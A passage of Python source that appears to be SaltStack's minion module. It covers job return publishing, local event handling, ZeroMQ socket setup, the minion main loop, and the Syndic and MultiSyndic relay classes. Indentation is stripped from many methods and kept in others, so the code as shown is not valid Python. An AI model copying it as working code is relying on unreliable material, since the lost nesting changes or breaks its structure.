                    log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_monitor_socket(self):
if not HAS_ZMQ_MONITOR or not self.opts['zmq_monitor']:
return
self.monitor_socket = self.socket.get_monitor_socket()
t = threading.Thread(target=self._socket_monitor, args=(self.monitor_socket,))
t.start()
def _socket_monitor(self, monitor):
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
while monitor.poll():
evt = zmq.utils.monitor.recv_monitor_message(monitor)
evt.update({'description': event_map[evt['event']]})
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
break
monitor.close()
log.trace("event monitor thread done!")
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self.socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self.socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
    @property
    def master_pub(self):
        '''
        Return the master publish port as a zmq URL,
        e.g. tcp://<master_ip>:<publish_port>
        '''
        return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
                                          port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
Authenticate with the master, this method breaks the functional
paradigm, it will update the master information from a fresh sign
in, signing in can occur as often as needed to keep up with the
revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.SAuth(self.opts)
auth.authenticate()
# TODO: remove these and just use a local reference to auth??
self.tok = auth.gen_token('salt')
self.crypticle = auth.crypticle
if self.opts.get('syndic_master_publish_port'):
self.publish_port = self.opts.get('syndic_master_publish_port')
else:
self.publish_port = auth.creds['publish_port']
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
if func == 'delete':
self.schedule.delete_job(name)
elif func == 'add':
self.schedule.add_job(schedule)
elif func == 'modify':
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, where)
elif func == 'run_job':
self.schedule.run_job(name, where)
elif func == 'disable_job':
self.schedule.disable_job(name, where)
elif func == 'reload':
self.schedule.reload(schedule)
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
    def _pre_tune(self):
        '''
        Set the minion running flag and issue the appropriate warnings if
        the minion cannot be started or is already running
        '''
        if self._running is None:
            # First start: flip the flag and let tune_in proceed
            self._running = True
        elif self._running is False:
            log.error(
                'This {0} was scheduled to stop. Not running '
                '{0}.tune_in()'.format(self.__class__.__name__)
            )
            return
        elif self._running is True:
            log.error(
                'This {0} is already running. Not running '
                '{0}.tune_in()'.format(self.__class__.__name__)
            )
            return
        try:
            log.info(
                '{0} is starting as user \'{1}\''.format(
                    self.__class__.__name__,
                    salt.utils.get_user()
                )
            )
        except Exception as err:
            # Only windows is allowed to fail here. See #3189. Log as debug in
            # that case. Else, error.
            log.log(
                salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
                'Failed to get the user who is starting {0}'.format(
                    self.__class__.__name__
                ),
                exc_info=err
            )
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
ret = channel.send(load)
return ret
    def handle_event(self, package):
        '''
        Handle an event from the epull_sock (all local minion events)

        Dispatches on the event tag prefix: module/pillar/grains refreshes,
        schedule management, environment changes, mine data, events to
        forward to the master, and master connectivity state changes.
        '''
        log.debug('Handling event {0!r}'.format(package))
        if package.startswith('module_refresh'):
            tag, data = salt.utils.event.MinionEvent.unpack(package)
            self.module_refresh(notify=data.get('notify', False))
        elif package.startswith('pillar_refresh'):
            self.pillar_refresh()
        elif package.startswith('manage_schedule'):
            self.manage_schedule(package)
        elif package.startswith('grains_refresh'):
            # Only re-run the (expensive) pillar compile if grains changed
            if self.grains_cache != self.opts['grains']:
                self.pillar_refresh(force_refresh=True)
                self.grains_cache = self.opts['grains']
        elif package.startswith('environ_setenv'):
            self.environ_setenv(package)
        elif package.startswith('_minion_mine'):
            self._mine_send(package)
        elif package.startswith('fire_master'):
            tag, data = salt.utils.event.MinionEvent.unpack(package)
            log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
            self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
        elif package.startswith('__master_disconnected'):
            tag, data = salt.utils.event.MinionEvent.unpack(package)
            # if the master disconnect event is for a different master, raise an exception
            if data['master'] != self.opts['master']:
                raise Exception()
            if self.connected:
                # we are not connected anymore
                self.connected = False
                # modify the scheduled job to fire only on reconnect
                schedule = {
                    'function': 'status.master',
                    'seconds': self.opts['master_alive_interval'],
                    'jid_include': True,
                    'maxrunning': 2,
                    'kwargs': {'master': self.opts['master'],
                               'connected': False}
                }
                self.schedule.modify_job(name='__master_alive',
                                         schedule=schedule)
                log.info('Connection to master {0} lost'.format(self.opts['master']))
                if self.opts['master_type'] == 'failover':
                    log.info('Trying to tune in to next master from master-list')
                    # if eval_master finds a new master for us, self.connected
                    # will be True again on successful master authentication
                    self.opts['master'] = self.eval_master(opts=self.opts,
                                                           failed=True)
                    if self.connected:
                        # re-init the subsystems to work with the new master
                        log.info('Re-initialising subsystems for new '
                                 'master {0}'.format(self.opts['master']))
                        # Drop the old zmq plumbing and rebuild it against
                        # the freshly-selected master
                        del self.socket
                        del self.context
                        del self.poller
                        self._init_context_and_poller()
                        self.socket = self.context.socket(zmq.SUB)
                        self._set_reconnect_ivl()
                        self._setsockopts()
                        self.socket.connect(self.master_pub)
                        self.poller.register(self.socket, zmq.POLLIN)
                        self.poller.register(self.epull_sock, zmq.POLLIN)
                        self._fire_master_minion_start()
                        log.info('Minion is ready to receive requests!')
                        # update scheduled job to run with the new master addr
                        schedule = {
                            'function': 'status.master',
                            'seconds': self.opts['master_alive_interval'],
                            'jid_include': True,
                            'maxrunning': 2,
                            'kwargs': {'master': self.opts['master'],
                                       'connected': True}
                        }
                        self.schedule.modify_job(name='__master_alive',
                                                 schedule=schedule)
        elif package.startswith('__master_connected'):
            # handle this event only once. otherwise it will pollute the log
            if not self.connected:
                log.info('Connection to master {0} re-established'.format(self.opts['master']))
                self.connected = True
                # modify the __master_alive job to only fire,
                # if the connection is lost again
                schedule = {
                    'function': 'status.master',
                    'seconds': self.opts['master_alive_interval'],
                    'jid_include': True,
                    'maxrunning': 2,
                    'kwargs': {'master': self.opts['master'],
                               'connected': True}
                }
                self.schedule.modify_job(name='__master_alive',
                                         schedule=schedule)
        elif package.startswith('_salt_error'):
            tag, data = salt.utils.event.MinionEvent.unpack(package)
            log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
            self._fire_master(data, tag)
def _windows_thread_cleanup(self):
'''
Cleanup Windows threads
'''
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
    # Main Minion Tune In
    def tune_in(self):
        '''
        Lock onto the publisher. This is the main event loop for the minion
        :rtype : None

        Sets up the event system and the subscriber socket to the master,
        fires the start event, then polls master publishes, local events
        and the scheduler until self._running goes False.
        '''
        self._pre_tune()
        # Properly exit if a SIGTERM is signalled
        signal.signal(signal.SIGTERM, self.clean_die)
        log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
        self._prepare_minion_event_system()
        self.socket = self.context.socket(zmq.SUB)
        self._set_reconnect_ivl()
        self._setsockopts()
        self._set_monitor_socket()
        self.socket.connect(self.master_pub)
        self.poller.register(self.socket, zmq.POLLIN)
        self.poller.register(self.epull_sock, zmq.POLLIN)
        self._fire_master_minion_start()
        log.info('Minion is ready to receive requests!')
        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()
        # Make sure to gracefully handle CTRL_LOGOFF_EVENT
        salt.utils.enable_ctrl_logoff_handler()
        # On first startup execute a state run if configured to do so
        self._state_run()
        loop_interval = int(self.opts['loop_interval'])
        try:
            if self.opts['grains_refresh_every']:  # If exists and is not zero. In minutes, not seconds!
                if self.opts['grains_refresh_every'] > 1:
                    log.debug(
                        'Enabling the grains refresher. Will run every {0} minutes.'.format(
                            self.opts['grains_refresh_every'])
                    )
                else:  # Clean up minute vs. minutes in log message
                    log.debug(
                        'Enabling the grains refresher. Will run every {0} minute.'.format(
                            self.opts['grains_refresh_every'])
                    )
                self._refresh_grains_watcher(
                    abs(self.opts['grains_refresh_every'])
                )
        except Exception as exc:
            log.error(
                'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
                    exc)
            )
        # Optional periodic ping keeps the master connection warm
        ping_interval = self.opts.get('ping_interval', 0) * 60
        ping_at = None
        while self._running is True:
            loop_interval = self.process_schedule(self, loop_interval)
            self._windows_thread_cleanup()
            try:
                socks = self._do_poll(loop_interval)
                if ping_interval > 0:
                    # Any socket activity resets the ping deadline
                    if socks or not ping_at:
                        ping_at = time.time() + ping_interval
                    if ping_at < time.time():
                        log.debug('Ping master')
                        self._fire_master('ping', 'minion_ping')
                        ping_at = time.time() + ping_interval
                self._do_socket_recv(socks)
                self._do_event_poll(socks)
                self._process_beacons()
            except zmq.ZMQError as exc:
                # The interrupt caused by python handling the
                # SIGCHLD. Throws this error with errno == EINTR.
                # Nothing to receive on the zmq socket throws this error
                # with EAGAIN.
                # Both are safe to ignore
                if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
                    log.critical('Unexpected ZMQError while polling minion',
                                 exc_info=True)
                continue
            except SaltClientError:
                raise
            except Exception:
                log.critical(
                    'An exception occurred while polling the minion',
                    exc_info=True
                )
    def tune_in_no_block(self):
        '''
        Executes the tune_in sequence but omits extra logging and the
        management of the event bus assuming that these are handled outside
        the tune_in sequence

        This is a generator: it yields True after every recoverable polling
        error so an external loop can keep driving it.
        '''
        self._pre_tune()
        self._init_context_and_poller()
        self.socket = self.context.socket(zmq.SUB)
        self._setsockopts()
        self.socket.connect(self.master_pub)
        self.poller.register(self.socket, zmq.POLLIN)
        self._fire_master_minion_start()
        loop_interval = int(self.opts['loop_interval'])
        # On first startup execute a state run if configured to do so
        self._state_run()
        while self._running is True:
            try:
                socks = self._do_poll(loop_interval)
                self._do_socket_recv(socks)
                # Check the event system
            except zmq.ZMQError:
                # If a zeromq error happens recover
                yield True
            except Exception:
                log.critical(
                    'An exception occurred while polling the minion',
                    exc_info=True
                )
                yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_event_poll(self, socks):
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
package = self.epull_sock.recv(zmq.NOBLOCK)
try:
self.handle_event(package)
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
# topic filtering is done at the zmq level, so we just strip it
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if getattr(self, 'poller', None) is not None:
if isinstance(self.poller.sockets, dict):
for socket in six.iterkeys(self.poller.sockets):
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
    def __del__(self):
        # Best-effort teardown when the object is garbage collected;
        # destroy() checks .closed flags so repeated calls are safe
        self.destroy()
class Syndic(Minion):
    '''
    Make a Syndic minion, this minion will use the minion keys on the
    master to authenticate with a higher level master.
    '''
    def __init__(self, opts, **kwargs):
        self._syndic_interface = opts.get('interface')
        self._syndic = True
        # force auth_safemode True because Syndic don't support autorestart
        opts['auth_safemode'] = True
        opts['loop_interval'] = 1
        super(Syndic, self).__init__(opts, **kwargs)
        self.mminion = salt.minion.MasterMinion(opts)

    def _handle_aes(self, load, sig=None):
        '''
        Takes the AES encrypted load, decrypts it, and runs the encapsulated
        instructions
        '''
        # If the AES authentication has changed, re-authenticate
        try:
            data = self.crypticle.loads(load)
        except AuthenticationError:
            self.authenticate()
            data = self.crypticle.loads(load)
        # Verify that the publication is valid
        if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
                or 'arg' not in data:
            return
        # Decrement the hop counter so the job is not relayed forever
        data['to'] = int(data.get('to', self.opts['timeout'])) - 1
        if 'user' in data:
            log.debug(
                'User {0[user]} Executing syndic command {0[fun]} with '
                'jid {0[jid]}'.format(
                    data
                )
            )
        else:
            log.debug(
                'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
                    data
                )
            )
        log.debug('Command details: {0}'.format(data))
        self._handle_decoded_payload(data)

    def _handle_decoded_payload(self, data):
        '''
        Override this method if you wish to handle the decoded data
        differently.
        '''
        # Only forward the command if it didn't originate from ourselves
        if data.get('master_id', 0) != self.opts.get('master_id', 1):
            self.syndic_cmd(data)

    def syndic_cmd(self, data):
        '''
        Take the now clear load and forward it on to the client cmd
        '''
        # Set up default tgt_type
        if 'tgt_type' not in data:
            data['tgt_type'] = 'glob'
        kwargs = {}
        # optionally add a few fields to the publish data
        for field in ('master_id',  # which master the job came from
                      'user',  # which user ran the job
                      ):
            if field in data:
                kwargs[field] = data[field]
        # Send out the publication
        self.local.pub(data['tgt'],
                       data['fun'],
                       data['arg'],
                       data['tgt_type'],
                       data['ret'],
                       data['jid'],
                       data['to'],
                       **kwargs)

    def _setsockopts(self):
        '''
        Subscriber socket options for a syndic: no topic filtering, plus
        the shared identity/reconnect/keepalive tuning.
        '''
        # no filters for syndication masters, unless we want to maintain a
        # list of all connected minions and update the filter
        self.socket.setsockopt(zmq.SUBSCRIBE, '')
        self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
        self._set_reconnect_ivl_max()
        self._set_tcp_keepalive()
        self._set_ipv4only()

    def _fire_master_syndic_start(self):
        '''
        Announce to the upstream master that this syndic is live, on both
        the legacy tag and the namespaced syndic/<id>/start tag.
        '''
        # Send an event to the master that the minion is live
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            'syndic_start'
        )
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            tagify([self.opts['id'], 'start'], 'syndic'),
        )

    def tune_in_no_block(self):
        '''
        Executes the tune_in sequence but omits extra logging and the
        management of the event bus assuming that these are handled outside
        the tune_in sequence

        This is a generator: it yields True after every recoverable error.
        '''
        # Instantiate the local client
        self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
        self.local.event.subscribe('')
        self._init_context_and_poller()
        self.socket = self.context.socket(zmq.SUB)
        self._setsockopts()
        self.socket.connect(self.master_pub)
        self.poller.register(self.socket, zmq.POLLIN)
        loop_interval = int(self.opts['loop_interval'])
        self._fire_master_syndic_start()
        while True:
            try:
                socks = dict(self.poller.poll(loop_interval * 1000))
                if socks.get(self.socket) == zmq.POLLIN:
                    self._process_cmd_socket()
            except zmq.ZMQError:
                yield True
            except Exception:
                log.critical(
                    'An exception occurred while polling the minion',
                    exc_info=True
                )
                yield True

    # Syndic Tune In
    def tune_in(self):
        '''
        Lock onto the publisher. This is the main event loop for the syndic

        Relays publishes from the upstream master to local minions and
        aggregates local events/returns for forwarding back upstream.
        '''
        signal.signal(signal.SIGTERM, self.clean_die)
        log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
        self._init_context_and_poller()
        # Instantiate the local client
        self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
        self.local.event.subscribe('')
        self.local.opts['interface'] = self._syndic_interface
        # register the event sub to the poller
        self.poller.register(self.local.event.sub)
        # Start with the publish socket
        # Share the poller with the event object
        self.socket = self.context.socket(zmq.SUB)
        self._setsockopts()
        self.socket.connect(self.master_pub)
        self.poller.register(self.socket, zmq.POLLIN)
        # Send an event to the master that the minion is live
        self._fire_master_syndic_start()
        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()
        loop_interval = int(self.opts['loop_interval'])
        self._reset_event_aggregation()
        while True:
            try:
                # Do all the maths in seconds
                timeout = loop_interval
                if self.event_forward_timeout is not None:
                    # Wake early enough to honor the forwarding deadline
                    timeout = min(timeout,
                                  self.event_forward_timeout - time.time())
                if timeout >= 0:
                    log.trace('Polling timeout: %f', timeout)
                    socks = dict(self.poller.poll(timeout * 1000))
                else:
                    # This shouldn't really happen.
                    # But there's no harm being defensive
                    log.warning('Negative timeout in syndic main loop')
                    socks = {}
                if socks.get(self.socket) == zmq.POLLIN:
                    self._process_cmd_socket()
                if socks.get(self.local.event.sub) == zmq.POLLIN:
                    self._process_event_socket()
                if self.event_forward_timeout is not None and \
                        self.event_forward_timeout < time.time():
                    self._forward_events()
            # We don't handle ZMQErrors like the other minions
            # I've put explicit handling around the receive calls
            # in the process_*_socket methods. If we see any other
            # errors they may need some kind of handling so log them
            # for now.
            except Exception:
                log.critical(
                    'An exception occurred while polling the syndic',
                    exc_info=True
                )

    def _process_cmd_socket(self):
        '''
        Receive and decode one publish message from the upstream master
        socket and hand the payload off for local re-publication.
        '''
        try:
            messages = self.socket.recv_multipart(zmq.NOBLOCK)
            messages_len = len(messages)
            idx = None
            if messages_len == 1:
                idx = 0
            elif messages_len == 2:
                idx = 1
            else:
                raise SaltSyndicMasterError('Syndication master received message of invalid len ({0}/2)'.format(messages_len))
            payload = self.serial.loads(messages[idx])
        except zmq.ZMQError as e:
            # Swallow errors for bad wakeups or signals needing processing
            if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
                raise
            # Nothing was received, so there is no payload to handle.
            # (Falling through here previously raised a NameError on the
            # unbound 'payload' variable.)
            return
        log.trace('Handling payload')
        self._handle_payload(payload)

    def _reset_event_aggregation(self):
        '''
        Clear the per-cycle aggregation state: collected job returns,
        raw events, and the forwarding deadline.
        '''
        self.jids = {}
        self.raw_events = []
        self.event_forward_timeout = None

    def _process_event_socket(self):
        '''
        Drain events from the local event bus, aggregating job returns
        into self.jids and other events into self.raw_events, until the
        bus is empty or the processing time budget is spent.
        '''
        tout = time.time() + self.opts['syndic_max_event_process_time']
        while tout > time.time():
            try:
                event = self.local.event.get_event_noblock()
            except zmq.ZMQError as e:
                # EAGAIN indicates no more events at the moment
                # EINTR some kind of signal maybe someone trying
                # to get us to quit so escape our timeout
                if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
                    break
                raise
            log.trace('Got event {0}'.format(event['tag']))
            if self.event_forward_timeout is None:
                # First event of this cycle starts the forwarding clock
                self.event_forward_timeout = (
                    time.time() + self.opts['syndic_event_forward_timeout']
                )
            tag_parts = event['tag'].split('/')
            if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
                    salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
                    'return' in event['data']:
                if 'jid' not in event['data']:
                    # Not a job return
                    continue
                jdict = self.jids.setdefault(event['tag'], {})
                if not jdict:
                    jdict['__fun__'] = event['data'].get('fun')
                    jdict['__jid__'] = event['data']['jid']
                    jdict['__load__'] = {}
                    fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
                    jdict['__load__'].update(
                        self.mminion.returners[fstr](event['data']['jid'])
                    )
                if 'master_id' in event['data']:
                    # __'s to make sure it doesn't print out on the master cli
                    jdict['__master_id__'] = event['data']['master_id']
                jdict[event['data']['id']] = event['data']['return']
            else:
                # Add generic event aggregation here
                if 'retcode' not in event['data']:
                    self.raw_events.append(event)

    def _forward_events(self):
        '''
        Push the aggregated raw events and job returns up to the master,
        then reset the aggregation state for the next cycle.
        '''
        log.trace('Forwarding events')
        if self.raw_events:
            self._fire_master(events=self.raw_events,
                              pretag=tagify(self.opts['id'], base='syndic'),
                              )
        for jid in self.jids:
            self._return_pub(self.jids[jid], '_syndic_return')
        self._reset_event_aggregation()

    def destroy(self):
        '''
        Tear down the syndic minion
        '''
        # We borrowed the local clients poller so give it back before
        # it's destroyed. Reset the local poller reference.
        self.poller = None
        super(Syndic, self).destroy()
        if hasattr(self, 'local'):
            del self.local
class MultiSyndic(MinionBase):
    '''
    Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
    all minions connected to it to the list of masters it is connected to.

    Modes (controlled by `syndic_mode`):
        sync: This mode will synchronize all events and publishes from higher level masters
        cluster: This mode will only sync job publishes and returns

    Note: jobs will be returned best-effort to the requesting master. This also means
    (since we are using zmq) that if a job was fired and the master disconnects
    between the publish and return, that the return will end up in a zmq buffer
    in this Syndic headed to that original master.

    In addition, since these classes all seem to use a mix of blocking and non-blocking
    calls (with varying timeouts along the way) this daemon does not handle failure well,
    it will (under most circumstances) stall the daemon for ~15s trying to forward events
    to the down master
    '''
    # time (seconds) to wait when connecting to an upstream master
    SYNDIC_CONNECT_TIMEOUT = 5
    # time (seconds) to wait when forwarding events/returns upstream
    SYNDIC_EVENT_TIMEOUT = 5

    def __init__(self, opts):
        # The syndic needs to poll frequently, so force a tight loop interval
        opts['loop_interval'] = 1
        super(MultiSyndic, self).__init__(opts)
        self.mminion = salt.minion.MasterMinion(opts)
        # sync (old behavior), cluster (only returns and publishes)
        self.syndic_mode = self.opts.get('syndic_mode', 'sync')

        # Set once ANY upstream master connection succeeds
        self._has_master = threading.Event()

        # create all of the syndics you need
        self.master_syndics = {}
        for master in set(self.opts['master']):
            self._init_master_conn(master)

        log.info('Syndic waiting on any master to connect...')
        # threading events are un-interruptible in python 2 :/
        while not self._has_master.is_set():
            self._has_master.wait(1)

    def _init_master_conn(self, master):
        '''
        Start a thread to connect to the master `master`
        '''
        # if we are re-creating one, lets make sure its not still in use
        if master in self.master_syndics:
            if 'sign_in_thread' in self.master_syndics[master]:
                self.master_syndics[master]['sign_in_thread'].join(0)
                if self.master_syndics[master]['sign_in_thread'].is_alive():
                    return
        # otherwise we make one!
        s_opts = copy.copy(self.opts)
        s_opts['master'] = master
        t = threading.Thread(target=self._connect_to_master_thread, args=(master,))
        t.daemon = True
        self.master_syndics[master] = {'opts': s_opts,
                                       'auth_wait': s_opts['acceptance_wait_time'],
                                       'dead_until': 0,
                                       'sign_in_thread': t,
                                       }
        t.start()

    def _connect_to_master_thread(self, master):
        '''
